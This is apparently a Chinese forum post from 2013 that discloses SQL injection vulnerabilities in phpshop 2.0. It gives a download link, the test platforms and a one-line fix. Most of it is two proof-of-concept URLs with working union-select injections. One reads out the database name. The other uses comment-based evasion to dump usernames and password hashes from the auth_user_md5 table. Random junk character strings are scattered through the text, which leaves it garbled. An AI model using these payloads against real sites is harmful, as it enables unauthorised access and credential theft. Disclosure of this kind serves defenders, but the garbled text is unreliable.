标题 : phpshop 2.0 SQL Injection Vulnerability1 |, ]0 p8 c! P2 |8 r. y
! f: p. H8 k; \" }" M# U
作者 : By onestree$ ]) ~2 |, o6 q' d# w
下载地址 : http://code.google.com/p/phpshop/downloads/list
- D, f* O! C! G6 X: z: @; o测试地址: windows 7 / ubuntu
! Z8 Y. k, u% Z$ Z
+ G, y I5 b, T9 _" n: _! I) S / R) c1 U, d0 c! L" v' H. w
SQLi p0c:
1 R, D/ Y+ ^9 W6 S9 w9 s8 ? 5 B$ F9 w- R9 |/ T) _
==================
8 S+ g4 [# k) X1 Q $ i" O4 m" C8 H0 X. {! r. b
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'! s& d7 `* Z/ W, g) P, t9 a
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
' i2 X! o. E/ z( T4 I % P" M3 w; [* D1 |
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--( P% q1 i7 `; V% F6 v( D- C" t
/ x( X/ Q& k# T8 N6 n. R
修复:
1 V3 x, F" n0 y- M1 ?( C8 u加强过滤
, g$ l" A% \( A' r
0 l# u7 g7 X9 W( U }5 e
3 {, |) ]$ x) t/ ~; q+ O& K |
发表于 2013-1-18 18:24:10
收藏
支持
反对